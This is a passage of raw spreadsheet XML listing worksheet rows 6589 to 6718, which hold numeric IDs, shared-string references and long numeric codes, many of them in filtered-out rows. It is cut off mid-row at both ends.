      <c r="A6589">
        <v>5193</v>
      </c>
      <c r="B6589" t="s">
        <v>14214</v>
      </c>
      <c r="C6589">
        <v>286000932356</v>
      </c>
    </row>
    <row r="6590" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6590">
        <v>5194</v>
      </c>
      <c r="B6590" t="s">
        <v>14214</v>
      </c>
      <c r="C6590">
        <v>258000932636</v>
      </c>
    </row>
    <row r="6591" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6591">
        <v>1627</v>
      </c>
      <c r="B6591" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6592" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6592">
        <v>1627</v>
      </c>
      <c r="B6592" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6593" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6593">
        <v>5195</v>
      </c>
      <c r="B6593" t="s">
        <v>14214</v>
      </c>
      <c r="C6593">
        <v>216010230844</v>
      </c>
    </row>
    <row r="6594" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6594">
        <v>5190</v>
      </c>
      <c r="B6594" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6595" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6595">
        <v>5188</v>
      </c>
      <c r="B6595" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6596" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6596">
        <v>5172</v>
      </c>
      <c r="B6596" t="s">
        <v>14203</v>
      </c>
      <c r="C6596" t="s">
        <v>16103</v>
      </c>
    </row>
    <row r="6597" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6597">
        <v>5196</v>
      </c>
      <c r="B6597" t="s">
        <v>14214</v>
      </c>
      <c r="C6597">
        <v>9120208242369</v>
      </c>
    </row>
    <row r="6598" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6598">
        <v>1370</v>
      </c>
      <c r="B6598" t="s">
        <v>14214</v>
      </c>
      <c r="C6598">
        <v>206010120927</v>
      </c>
    </row>
    <row r="6599" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6599">
        <v>5183</v>
      </c>
      <c r="B6599" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6600" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6600">
        <v>5191</v>
      </c>
      <c r="B6600" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6601" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6601">
        <v>5192</v>
      </c>
      <c r="B6601" t="s">
        <v>14203</v>
      </c>
      <c r="C6601" t="s">
        <v>16104</v>
      </c>
    </row>
    <row r="6602" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6602">
        <v>5197</v>
      </c>
      <c r="B6602" t="s">
        <v>14214</v>
      </c>
      <c r="C6602">
        <v>220002463407</v>
      </c>
    </row>
    <row r="6603" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6603">
        <v>5198</v>
      </c>
      <c r="B6603" t="s">
        <v>14214</v>
      </c>
      <c r="C6603">
        <v>8120005811069</v>
      </c>
    </row>
    <row r="6604" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6604">
        <v>5199</v>
      </c>
      <c r="B6604" t="s">
        <v>14214</v>
      </c>
      <c r="C6604">
        <v>286010210298</v>
      </c>
    </row>
    <row r="6605" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6605">
        <v>5200</v>
      </c>
      <c r="B6605" t="s">
        <v>14214</v>
      </c>
      <c r="C6605">
        <v>9120105420528</v>
      </c>
    </row>
    <row r="6606" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6606">
        <v>5166</v>
      </c>
      <c r="B6606" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6607" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6607">
        <v>5201</v>
      </c>
      <c r="B6607" t="s">
        <v>14214</v>
      </c>
      <c r="C6607">
        <v>9120118030226</v>
      </c>
    </row>
    <row r="6608" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6608">
        <v>5179</v>
      </c>
      <c r="B6608" t="s">
        <v>14203</v>
      </c>
      <c r="C6608">
        <v>965319189501000</v>
      </c>
    </row>
    <row r="6609" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6609">
        <v>5202</v>
      </c>
      <c r="B6609" t="s">
        <v>14214</v>
      </c>
      <c r="C6609">
        <v>220007292776</v>
      </c>
    </row>
    <row r="6610" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6610">
        <v>466</v>
      </c>
      <c r="B6610" t="s">
        <v>14214</v>
      </c>
      <c r="C6610">
        <v>282011101101</v>
      </c>
    </row>
    <row r="6611" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6611">
        <v>1078</v>
      </c>
      <c r="B6611" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6612" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6612">
        <v>5203</v>
      </c>
      <c r="B6612" t="s">
        <v>14214</v>
      </c>
      <c r="C6612">
        <v>9120307331546</v>
      </c>
    </row>
    <row r="6613" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6613">
        <v>5204</v>
      </c>
      <c r="B6613" t="s">
        <v>14214</v>
      </c>
      <c r="C6613">
        <v>239010021634</v>
      </c>
    </row>
    <row r="6614" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6614">
        <v>5205</v>
      </c>
      <c r="B6614" t="s">
        <v>14214</v>
      </c>
      <c r="C6614">
        <v>8120210022746</v>
      </c>
    </row>
    <row r="6615" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6615">
        <v>5202</v>
      </c>
      <c r="B6615" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6616" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6616">
        <v>5133</v>
      </c>
      <c r="B6616" t="s">
        <v>14203</v>
      </c>
      <c r="C6616">
        <v>954419685513000</v>
      </c>
    </row>
    <row r="6617" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6617">
        <v>2580</v>
      </c>
      <c r="B6617" t="s">
        <v>14203</v>
      </c>
      <c r="C6617" t="s">
        <v>16105</v>
      </c>
    </row>
    <row r="6618" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6618">
        <v>1391</v>
      </c>
      <c r="B6618" t="s">
        <v>14214</v>
      </c>
      <c r="C6618" t="s">
        <v>16106</v>
      </c>
    </row>
    <row r="6619" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6619">
        <v>1391</v>
      </c>
      <c r="B6619" t="s">
        <v>14203</v>
      </c>
      <c r="C6619" t="s">
        <v>16106</v>
      </c>
    </row>
    <row r="6620" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6620">
        <v>5195</v>
      </c>
      <c r="B6620" t="s">
        <v>14203</v>
      </c>
      <c r="C6620" t="s">
        <v>16107</v>
      </c>
    </row>
    <row r="6621" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6621">
        <v>485</v>
      </c>
      <c r="B6621" t="s">
        <v>14214</v>
      </c>
      <c r="C6621">
        <v>9120208242369</v>
      </c>
    </row>
    <row r="6622" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6622">
        <v>5201</v>
      </c>
      <c r="B6622" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6623" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6623">
        <v>5206</v>
      </c>
      <c r="B6623" t="s">
        <v>14214</v>
      </c>
      <c r="C6623">
        <v>220302802894</v>
      </c>
    </row>
    <row r="6624" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6624">
        <v>5207</v>
      </c>
      <c r="B6624" t="s">
        <v>14214</v>
      </c>
      <c r="C6624">
        <v>9120317162303</v>
      </c>
    </row>
    <row r="6625" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6625">
        <v>5208</v>
      </c>
      <c r="B6625" t="s">
        <v>14214</v>
      </c>
      <c r="C6625">
        <v>220302802894</v>
      </c>
    </row>
    <row r="6626" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6626">
        <v>5209</v>
      </c>
      <c r="B6626" t="s">
        <v>14214</v>
      </c>
      <c r="C6626">
        <v>220302802894</v>
      </c>
    </row>
    <row r="6627" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6627">
        <v>5210</v>
      </c>
      <c r="B6627" t="s">
        <v>14214</v>
      </c>
      <c r="C6627">
        <v>209010041146</v>
      </c>
    </row>
    <row r="6628" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6628">
        <v>5171</v>
      </c>
      <c r="B6628" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6629" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6629">
        <v>5211</v>
      </c>
      <c r="B6629" t="s">
        <v>14214</v>
      </c>
      <c r="C6629">
        <v>8120015272896</v>
      </c>
    </row>
    <row r="6630" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6630">
        <v>5212</v>
      </c>
      <c r="B6630" t="s">
        <v>14214</v>
      </c>
      <c r="C6630">
        <v>279010150529</v>
      </c>
    </row>
    <row r="6631" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6631">
        <v>5206</v>
      </c>
      <c r="B6631" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6632" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6632">
        <v>5213</v>
      </c>
      <c r="B6632" t="s">
        <v>14214</v>
      </c>
      <c r="C6632">
        <v>2204078822146</v>
      </c>
    </row>
    <row r="6633" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6633">
        <v>5211</v>
      </c>
      <c r="B6633" t="s">
        <v>14203</v>
      </c>
      <c r="C6633" t="s">
        <v>16108</v>
      </c>
    </row>
    <row r="6634" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6634">
        <v>5203</v>
      </c>
      <c r="B6634" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6635" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6635">
        <v>5214</v>
      </c>
      <c r="B6635" t="s">
        <v>14214</v>
      </c>
      <c r="C6635">
        <v>9120213211028</v>
      </c>
    </row>
    <row r="6636" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6636">
        <v>5197</v>
      </c>
      <c r="B6636" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6637" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6637">
        <v>5193</v>
      </c>
      <c r="B6637" t="s">
        <v>14203</v>
      </c>
      <c r="C6637" t="s">
        <v>16109</v>
      </c>
    </row>
    <row r="6638" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6638">
        <v>5215</v>
      </c>
      <c r="B6638" t="s">
        <v>14214</v>
      </c>
      <c r="C6638">
        <v>210010250228</v>
      </c>
    </row>
    <row r="6639" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6639">
        <v>5194</v>
      </c>
      <c r="B6639" t="s">
        <v>14203</v>
      </c>
      <c r="C6639" t="s">
        <v>16110</v>
      </c>
    </row>
    <row r="6640" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6640">
        <v>5182</v>
      </c>
      <c r="B6640" t="s">
        <v>14203</v>
      </c>
      <c r="C6640" t="s">
        <v>16111</v>
      </c>
    </row>
    <row r="6641" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6641">
        <v>5216</v>
      </c>
      <c r="B6641" t="s">
        <v>14214</v>
      </c>
      <c r="C6641">
        <v>286010210298</v>
      </c>
    </row>
    <row r="6642" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6642">
        <v>5217</v>
      </c>
      <c r="B6642" t="s">
        <v>14214</v>
      </c>
      <c r="C6642">
        <v>9120118110879</v>
      </c>
    </row>
    <row r="6643" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6643">
        <v>5218</v>
      </c>
      <c r="B6643" t="s">
        <v>14214</v>
      </c>
      <c r="C6643">
        <v>8120014151279</v>
      </c>
    </row>
    <row r="6644" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6644">
        <v>5219</v>
      </c>
      <c r="B6644" t="s">
        <v>14214</v>
      </c>
      <c r="C6644">
        <v>8120106961024</v>
      </c>
    </row>
    <row r="6645" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6645">
        <v>5220</v>
      </c>
      <c r="B6645" t="s">
        <v>14214</v>
      </c>
      <c r="C6645">
        <v>230000922248</v>
      </c>
    </row>
    <row r="6646" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6646">
        <v>5221</v>
      </c>
      <c r="B6646" t="s">
        <v>14214</v>
      </c>
      <c r="C6646">
        <v>9120307232559</v>
      </c>
    </row>
    <row r="6647" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6647">
        <v>5222</v>
      </c>
      <c r="B6647" t="s">
        <v>14214</v>
      </c>
      <c r="C6647">
        <v>8120004991331</v>
      </c>
    </row>
    <row r="6648" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6648">
        <v>926</v>
      </c>
      <c r="B6648" t="s">
        <v>14214</v>
      </c>
      <c r="C6648">
        <v>8120008811366</v>
      </c>
    </row>
    <row r="6649" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6649">
        <v>5223</v>
      </c>
      <c r="B6649" t="s">
        <v>14214</v>
      </c>
      <c r="C6649">
        <v>8120102992858</v>
      </c>
    </row>
    <row r="6650" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6650">
        <v>5224</v>
      </c>
      <c r="B6650" t="s">
        <v>14214</v>
      </c>
      <c r="C6650">
        <v>9120603761679</v>
      </c>
    </row>
    <row r="6651" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6651">
        <v>5225</v>
      </c>
      <c r="B6651" t="s">
        <v>14214</v>
      </c>
      <c r="C6651">
        <v>9120603761679</v>
      </c>
    </row>
    <row r="6652" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6652">
        <v>5226</v>
      </c>
      <c r="B6652" t="s">
        <v>14214</v>
      </c>
      <c r="C6652">
        <v>9120603761679</v>
      </c>
    </row>
    <row r="6653" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6653">
        <v>5227</v>
      </c>
      <c r="B6653" t="s">
        <v>14214</v>
      </c>
      <c r="C6653">
        <v>9120603761679</v>
      </c>
    </row>
    <row r="6654" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6654">
        <v>5057</v>
      </c>
      <c r="B6654" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6655" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6655">
        <v>5217</v>
      </c>
      <c r="B6655" t="s">
        <v>14203</v>
      </c>
      <c r="C6655" t="s">
        <v>16112</v>
      </c>
    </row>
    <row r="6656" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6656">
        <v>5228</v>
      </c>
      <c r="B6656" t="s">
        <v>14214</v>
      </c>
      <c r="C6656">
        <v>220003141052</v>
      </c>
    </row>
    <row r="6657" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6657">
        <v>5229</v>
      </c>
      <c r="B6657" t="s">
        <v>14214</v>
      </c>
      <c r="C6657">
        <v>9120116030276</v>
      </c>
    </row>
    <row r="6658" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6658">
        <v>5230</v>
      </c>
      <c r="B6658" t="s">
        <v>14214</v>
      </c>
      <c r="C6658">
        <v>220007252217</v>
      </c>
    </row>
    <row r="6659" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6659">
        <v>5231</v>
      </c>
      <c r="B6659" t="s">
        <v>14214</v>
      </c>
      <c r="C6659">
        <v>9120306252176</v>
      </c>
    </row>
    <row r="6660" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6660">
        <v>5232</v>
      </c>
      <c r="B6660" t="s">
        <v>14214</v>
      </c>
      <c r="C6660">
        <v>233010202142</v>
      </c>
    </row>
    <row r="6661" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6661">
        <v>5221</v>
      </c>
      <c r="B6661" t="s">
        <v>14203</v>
      </c>
      <c r="C6661">
        <v>28813921036000</v>
      </c>
    </row>
    <row r="6662" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6662">
        <v>5232</v>
      </c>
      <c r="B6662" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6663" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6663">
        <v>5233</v>
      </c>
      <c r="B6663" t="s">
        <v>14214</v>
      </c>
      <c r="C6663">
        <v>277010242893</v>
      </c>
    </row>
    <row r="6664" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6664">
        <v>5234</v>
      </c>
      <c r="B6664" t="s">
        <v>14214</v>
      </c>
      <c r="C6664">
        <v>220100262776</v>
      </c>
    </row>
    <row r="6665" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6665">
        <v>5222</v>
      </c>
      <c r="B6665" t="s">
        <v>14203</v>
      </c>
      <c r="C6665" t="s">
        <v>16113</v>
      </c>
    </row>
    <row r="6666" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6666">
        <v>5235</v>
      </c>
      <c r="B6666" t="s">
        <v>14214</v>
      </c>
      <c r="C6666">
        <v>8120015222426</v>
      </c>
    </row>
    <row r="6667" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6667">
        <v>5236</v>
      </c>
      <c r="B6667" t="s">
        <v>14214</v>
      </c>
      <c r="C6667">
        <v>262010113606</v>
      </c>
    </row>
    <row r="6668" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6668">
        <v>5204</v>
      </c>
      <c r="B6668" t="s">
        <v>14203</v>
      </c>
      <c r="C6668" t="s">
        <v>16114</v>
      </c>
    </row>
    <row r="6669" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6669">
        <v>5237</v>
      </c>
      <c r="B6669" t="s">
        <v>14214</v>
      </c>
      <c r="C6669">
        <v>9120001622808</v>
      </c>
    </row>
    <row r="6670" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6670">
        <v>5230</v>
      </c>
      <c r="B6670" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6671" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6671">
        <v>5238</v>
      </c>
      <c r="B6671" t="s">
        <v>14214</v>
      </c>
      <c r="C6671">
        <v>9120103851955</v>
      </c>
    </row>
    <row r="6672" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6672">
        <v>5239</v>
      </c>
      <c r="B6672" t="s">
        <v>14214</v>
      </c>
      <c r="C6672">
        <v>9120603761679</v>
      </c>
    </row>
    <row r="6673" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6673">
        <v>5240</v>
      </c>
      <c r="B6673" t="s">
        <v>14214</v>
      </c>
      <c r="C6673">
        <v>9120005682453</v>
      </c>
    </row>
    <row r="6674" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6674">
        <v>5241</v>
      </c>
      <c r="B6674" t="s">
        <v>14214</v>
      </c>
      <c r="C6674">
        <v>9120005682453</v>
      </c>
    </row>
    <row r="6675" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6675">
        <v>5242</v>
      </c>
      <c r="B6675" t="s">
        <v>14214</v>
      </c>
      <c r="C6675">
        <v>220004491155</v>
      </c>
    </row>
    <row r="6676" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6676">
        <v>5243</v>
      </c>
      <c r="B6676" t="s">
        <v>14214</v>
      </c>
      <c r="C6676">
        <v>1223000100766</v>
      </c>
    </row>
    <row r="6677" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6677">
        <v>5244</v>
      </c>
      <c r="B6677" t="s">
        <v>14214</v>
      </c>
      <c r="C6677">
        <v>9120205143419</v>
      </c>
    </row>
    <row r="6678" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6678">
        <v>5245</v>
      </c>
      <c r="B6678" t="s">
        <v>14214</v>
      </c>
      <c r="C6678">
        <v>9120603761679</v>
      </c>
    </row>
    <row r="6679" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6679">
        <v>5246</v>
      </c>
      <c r="B6679" t="s">
        <v>14214</v>
      </c>
      <c r="C6679">
        <v>9120603761679</v>
      </c>
    </row>
    <row r="6680" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6680">
        <v>5240</v>
      </c>
      <c r="B6680" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6681" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6681">
        <v>5228</v>
      </c>
      <c r="B6681" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6682" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6682">
        <v>1113</v>
      </c>
      <c r="B6682" t="s">
        <v>14214</v>
      </c>
      <c r="C6682">
        <v>1223000100766</v>
      </c>
    </row>
    <row r="6683" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6683">
        <v>5238</v>
      </c>
      <c r="B6683" t="s">
        <v>14203</v>
      </c>
      <c r="C6683" t="s">
        <v>16115</v>
      </c>
    </row>
    <row r="6684" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6684">
        <v>5247</v>
      </c>
      <c r="B6684" t="s">
        <v>14214</v>
      </c>
      <c r="C6684">
        <v>8120100811706</v>
      </c>
    </row>
    <row r="6685" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6685">
        <v>5242</v>
      </c>
      <c r="B6685" t="s">
        <v>14203</v>
      </c>
      <c r="C6685" t="s">
        <v>16116</v>
      </c>
    </row>
    <row r="6686" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6686">
        <v>5248</v>
      </c>
      <c r="B6686" t="s">
        <v>14214</v>
      </c>
      <c r="C6686">
        <v>220100772929</v>
      </c>
    </row>
    <row r="6687" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6687">
        <v>1116</v>
      </c>
      <c r="B6687" t="s">
        <v>14214</v>
      </c>
      <c r="C6687">
        <v>9120201192713</v>
      </c>
    </row>
    <row r="6688" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6688">
        <v>5249</v>
      </c>
      <c r="B6688" t="s">
        <v>14214</v>
      </c>
      <c r="C6688">
        <v>8120202812835</v>
      </c>
    </row>
    <row r="6689" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6689">
        <v>588</v>
      </c>
      <c r="B6689" t="s">
        <v>14214</v>
      </c>
      <c r="C6689">
        <v>1252000612747</v>
      </c>
    </row>
    <row r="6690" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6690">
        <v>5250</v>
      </c>
      <c r="B6690" t="s">
        <v>14214</v>
      </c>
      <c r="C6690">
        <v>245010131813</v>
      </c>
    </row>
    <row r="6691" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6691">
        <v>5251</v>
      </c>
      <c r="B6691" t="s">
        <v>14214</v>
      </c>
      <c r="C6691">
        <v>2200025220333</v>
      </c>
    </row>
    <row r="6692" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6692">
        <v>5252</v>
      </c>
      <c r="B6692" t="s">
        <v>14214</v>
      </c>
      <c r="C6692">
        <v>8120219101125</v>
      </c>
    </row>
    <row r="6693" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6693">
        <v>5252</v>
      </c>
      <c r="B6693" t="s">
        <v>14203</v>
      </c>
      <c r="C6693" t="s">
        <v>16117</v>
      </c>
    </row>
    <row r="6694" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6694">
        <v>5253</v>
      </c>
      <c r="B6694" t="s">
        <v>14214</v>
      </c>
      <c r="C6694">
        <v>8120201890372</v>
      </c>
    </row>
    <row r="6695" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6695">
        <v>5251</v>
      </c>
      <c r="B6695" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6696" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6696">
        <v>5254</v>
      </c>
      <c r="B6696" t="s">
        <v>14214</v>
      </c>
      <c r="C6696">
        <v>8120101833713</v>
      </c>
    </row>
    <row r="6697" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6697">
        <v>5255</v>
      </c>
      <c r="B6697" t="s">
        <v>14214</v>
      </c>
      <c r="C6697">
        <v>9120007131089</v>
      </c>
    </row>
    <row r="6698" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6698">
        <v>5256</v>
      </c>
      <c r="B6698" t="s">
        <v>14214</v>
      </c>
      <c r="C6698">
        <v>8120212241415</v>
      </c>
    </row>
    <row r="6699" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6699">
        <v>5257</v>
      </c>
      <c r="B6699" t="s">
        <v>14214</v>
      </c>
      <c r="C6699">
        <v>220100772929</v>
      </c>
    </row>
    <row r="6700" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6700">
        <v>5258</v>
      </c>
      <c r="B6700" t="s">
        <v>14214</v>
      </c>
      <c r="C6700">
        <v>8120202990554</v>
      </c>
    </row>
    <row r="6701" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6701">
        <v>5259</v>
      </c>
      <c r="B6701" t="s">
        <v>14214</v>
      </c>
      <c r="C6701">
        <v>8120108860612</v>
      </c>
    </row>
    <row r="6702" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6702">
        <v>5256</v>
      </c>
      <c r="B6702" t="s">
        <v>14203</v>
      </c>
      <c r="C6702" t="s">
        <v>16118</v>
      </c>
    </row>
    <row r="6703" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6703">
        <v>5249</v>
      </c>
      <c r="B6703" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6704" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6704">
        <v>5260</v>
      </c>
      <c r="B6704" t="s">
        <v>14214</v>
      </c>
      <c r="C6704">
        <v>1239000121624</v>
      </c>
    </row>
    <row r="6705" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6705">
        <v>5244</v>
      </c>
      <c r="B6705" t="s">
        <v>14203</v>
      </c>
      <c r="C6705" t="s">
        <v>16119</v>
      </c>
    </row>
    <row r="6706" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6706">
        <v>5261</v>
      </c>
      <c r="B6706" t="s">
        <v>14214</v>
      </c>
      <c r="C6706">
        <v>8120311082894</v>
      </c>
    </row>
    <row r="6707" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6707">
        <v>5205</v>
      </c>
      <c r="B6707" t="s">
        <v>14203</v>
      </c>
      <c r="C6707" t="s">
        <v>15870</v>
      </c>
    </row>
    <row r="6708" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6708">
        <v>5262</v>
      </c>
      <c r="B6708" t="s">
        <v>14214</v>
      </c>
      <c r="C6708">
        <v>220103762731</v>
      </c>
    </row>
    <row r="6709" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6709">
        <v>5263</v>
      </c>
      <c r="B6709" t="s">
        <v>14214</v>
      </c>
      <c r="C6709">
        <v>281010200479</v>
      </c>
    </row>
    <row r="6710" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6710">
        <v>5039</v>
      </c>
      <c r="B6710" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6711" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6711">
        <v>5264</v>
      </c>
      <c r="B6711" t="s">
        <v>14214</v>
      </c>
      <c r="C6711">
        <v>270010230122</v>
      </c>
    </row>
    <row r="6712" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6712">
        <v>5257</v>
      </c>
      <c r="B6712" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6713" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6713">
        <v>5258</v>
      </c>
      <c r="B6713" t="s">
        <v>14203</v>
      </c>
      <c r="C6713" t="s">
        <v>16052</v>
      </c>
    </row>
    <row r="6714" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6714">
        <v>976</v>
      </c>
      <c r="B6714" t="s">
        <v>14214</v>
      </c>
    </row>
    <row r="6715" spans="1:3" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6715">
        <v>5265</v>
      </c>
      <c r="B6715" t="s">
        <v>14214</v>
      </c>
      <c r="C6715">
        <v>292010162235</v>
      </c>
    </row>
    <row r="6716" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6716">
        <v>4856</v>
      </c>
      <c r="B6716" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6717" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6717">
        <v>5237</v>
      </c>
      <c r="B6717" t="s">
        <v>14203</v>
      </c>
    </row>
    <row r="6718" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6718">
        <v>5261</v>
